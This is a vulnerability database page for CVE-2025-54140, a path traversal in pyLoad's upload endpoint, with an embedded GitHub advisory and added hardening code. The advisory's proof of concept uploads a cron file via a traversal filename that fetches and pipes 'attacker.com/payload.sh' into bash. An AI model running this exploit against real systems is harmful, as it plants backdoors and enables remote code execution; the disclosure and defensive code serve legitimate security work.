
CVE-2025-54140

HIGH
Published 2025-07-22T21:34:30.750Z

CVSS Score

CVSS v3.1 base score: 7.5/10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
Base Score Metrics
Exploitability: N/A Impact: N/A

Attack Vector Metrics

Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED

Impact Metrics

Confidentiality
NONE
Integrity
HIGH
Availability
NONE

Description

pyLoad is a free and open-source Download Manager written in pure Python. In version 0.5.0b3.dev89, an authenticated path traversal vulnerability exists in the /json/upload endpoint of pyLoad. By manipulating the filename of an uploaded file, an attacker can traverse out of the intended upload directory, allowing them to write arbitrary files to any location on the system accessible to the pyLoad process. This may lead to: Remote Code Execution (RCE), local privilege escalation, system-wide compromise, persistence, and backdoors. This is fixed in version 0.5.0b3.dev90.

Available Exploits

No exploits available for this CVE.

Related News

No news articles found for this CVE.

Affected Products

EU Vulnerability Database

Monitored by ENISA for EU cybersecurity

EU Coordination

EU Coordinated

Exploitation Status

No Known Exploitation


Affected Products (ENISA)

pyload
pyload

ENISA Scoring

CVSS Score (3.1)

7.5/10
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

EPSS Score

0.180 (probability)

Data provided by ENISA EU Vulnerability Database. Last updated: July 23, 2025

GitHub Security Advisories

Community-driven vulnerability intelligence from GitHub

GitHub Reviewed. Severity: HIGH

`pyLoad` has Path Traversal Vulnerability in `json/upload` Endpoint that allows Arbitrary File Write

GHSA-xqpg-92fq-grfg

Advisory Details

## Summary

An **authenticated path traversal vulnerability** exists in the `/json/upload` endpoint of `pyLoad`. By **manipulating the filename of an uploaded file**, an attacker can traverse out of the intended upload directory, allowing them to **write arbitrary files to any location** on the system accessible to the pyLoad process. This may lead to:

* **Remote Code Execution (RCE)**
* **Local Privilege Escalation**
* **System-wide compromise**
* **Persistence and backdoors**

---

### Vulnerable Code

File: [`src/pyload/webui/app/blueprints/json_blueprint.py`](https://github.com/pyload/pyload/blob/df094db67ec6e25294a9ac0ddb4375fd7fb9ba00/src/pyload/webui/app/blueprints/json_blueprint.py#L109)

```python
@json_blueprint.route("/upload", methods=["POST"])
def upload():
    dir_path = api.get_config_value("general", "storage_folder")
    for file in request.files.getlist("file"):
        file_path = os.path.join(dir_path, "tmp_" + file.filename)
        file.save(file_path)
```

**Issue**: No sanitization or validation on `file.filename`, allowing traversal via `../../` sequences.

### Proof of Concept

Install pyLoad either from source or from PyPI:

1. **Clone and install pyLoad from source** (`pip install pyload-ng`):

```bash
git clone https://github.com/pyload/pyload
cd pyload
git checkout 0.4.20
python -m pip install -e .
pyload --userdir=/tmp/pyload
```

2. **Or install via pip (PyPI) in a virtualenv:**

```bash
python -m venv pyload-env
source pyload-env/bin/activate
pip install pyload==0.4.20
pyload
```

Then:

1. **Login and obtain session token**

```bash
curl -c cookies.txt -X POST http://127.0.0.1:8000/login \
  -d "username=admin&password=admin"
```

2. **Create malicious cron payload**

```bash
echo "*/1 * * * * root curl http://attacker.com/payload.sh | bash" > exploit
```

3. **Upload file with path traversal filename**

```bash
curl -b cookies.txt -X POST http://127.0.0.1:8000/json/upload \
  -F "file=@exploit;filename=../../../../etc/cron.d/pyload_backdoor"
```

4. On the next cron tick, a reverse shell or payload will be triggered.

### BurpSuite HTTP Request

```
POST /json/upload HTTP/1.1
Host: 127.0.0.1:8000
Cookie: session=SESSION_ID_HERE
Content-Type: multipart/form-data; boundary=------------------------d74496d66958873e

--------------------------d74496d66958873e
Content-Disposition: form-data; name="file"; filename="../../../../etc/cron.d/pyload_backdoor"
Content-Type: application/octet-stream

*/1 * * * * root curl http://attacker.com/payload.sh | bash
--------------------------d74496d66958873e--
```
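The advisory's root cause is that the client-controlled `file.filename` flows straight into `os.path.join`. The block below is an added example of how that path construction is hardened; it is not pyLoad's own code and not the fix shipped in 0.5.0b3.dev90 (which this page does not show). It keeps the advisory's convention that uploads land directly inside the configured storage folder as `tmp_<name>` files, uses only the standard library, and the names `safe_upload_path`, `save_upload`, `UnsafeFilename` and the probe filenames in `demo()` are constructed for this example.

```python
"""Hardened replacement for the upload path construction in the advisory.

Added example, not pyLoad's code or its actual fix. Assumes the storage
folder comes from configuration and that an upload may only ever be
written directly inside that folder, as a 'tmp_<name>' file.
"""
import os
import tempfile


class UnsafeFilename(ValueError):
    """Raised when an uploaded filename would escape the storage folder."""


def safe_upload_path(storage_folder: str, client_filename: str) -> str:
    """Return the absolute path an upload may be written to, or raise.

    Two independent layers, kept together for defence in depth:
    1. Reject (do not silently strip) any name that is empty, contains a
       path separator ('/' or '\\'), a NUL byte, or is '.'/'..'. Rejecting
       makes traversal probes visible in the application log instead of
       turning them into oddly named but harmless files.
    2. Build the path exactly as the vulnerable code did, then resolve it
       with realpath and require the result to still sit under the
       resolved storage folder. This also catches symlink tricks that a
       string check alone would miss.
    Note that the fixed 'tmp_' prefix is not a control on its own: it
    does nothing about separators later in the name.
    """
    name = client_filename.replace("\\", "/")
    if not name or "/" in name or "\x00" in name or name in (".", ".."):
        raise UnsafeFilename(f"rejected upload filename: {client_filename!r}")
    base = os.path.realpath(storage_folder)
    candidate = os.path.realpath(os.path.join(base, "tmp_" + name))
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafeFilename(f"upload path escapes storage folder: {candidate}")
    return candidate


def save_upload(storage_folder: str, client_filename: str, data: bytes) -> str:
    """Validate the name, then write the bytes; returns the path written."""
    path = safe_upload_path(storage_folder, client_filename)
    # 'x' mode refuses to clobber an existing file: a second safety net
    # against overwriting something that already lives in the folder.
    with open(path, "xb") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Run the check over a constructed benign name and over the traversal
    name from the advisory's PoC plus a few variants; returns the outcome
    per filename so the behaviour can be asserted on."""
    results = {}
    with tempfile.TemporaryDirectory() as storage:
        written = save_upload(storage, "report.txt", b"constructed sample")
        results["benign"] = os.path.basename(written)  # 'tmp_report.txt'
        probes = (
            "../../../../etc/cron.d/pyload_backdoor",  # the PoC filename
            "..\\..\\win_style",                        # backslash variant
            "sub/dir.txt",                              # nested path
            "",                                         # empty name
        )
        for probe in probes:
            try:
                safe_upload_path(storage, probe)
                results[probe] = "allowed"
            except UnsafeFilename:
                results[probe] = "rejected"
    return results


if __name__ == "__main__":
    for filename, outcome in demo().items():
        print(f"{filename!r}: {outcome}")
```

In a Flask application the first layer is commonly delegated to `werkzeug.utils.secure_filename`, which strips separators and `..` rather than rejecting them; the containment check on the resolved path is still worth keeping behind it, and rejected names are worth logging with the authenticated user, since a traversal filename from a logged-in account is a strong detection signal in its own right.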

Affected Packages

PyPI pyload-ng
ECOSYSTEM: ≥0.5.0b3.dev89 <0.5.0b3.dev90

CVSS Scoring

CVSS Score

7.5

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Advisory provided by GitHub Security Advisory Database. Published: July 21, 2025, Modified: July 23, 2025

References

Published: 2025-07-22T21:34:30.750Z
Last Modified: 2025-07-23T18:28:44.036Z